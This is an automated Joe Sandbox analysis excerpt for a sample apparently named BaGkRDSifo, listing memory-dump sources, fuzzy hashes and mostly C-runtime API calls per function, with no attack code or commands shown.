Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7369097bd5bff9db9bda5080482a3c9750c48dc30b7c7c3f3132240253c7fed
Instruction ID: 6e94012dbeb02cd45057b609d091c2b329482be4c103aacf40f0c722ea0759e5
Opcode Fuzzy Hash: b7369097bd5bff9db9bda5080482a3c9750c48dc30b7c7c3f3132240253c7fed
Instruction Fuzzy Hash: 85517B30E003449FEB45EF37E94069A7BE3BBC8304F58C92DC0059B264DB78584AABA5

Function 00401650 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77

Function 00402F20 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795

Function 00402F89 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,025A18F8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Strings

'B, xrefs: 0040C70F

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID: 'B
API String ID: 2805327698-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(025A1690), ref: 00414050

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040FA7A
__calloc_crt.LIBCMT ref: 0040FA93

Strings

P$B, xrefs: 0040FAAA
`$B, xrefs: 0040FACC

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 004146FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 0041470C

Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A

___removelocaleref.LIBCMT ref: 00414717

Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1

___freetlocinfo.LIBCMT ref: 0041472B

Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575

Strings

@.B, xrefs: 00414722

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: @.B
API String ID: 467427115-470711618
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
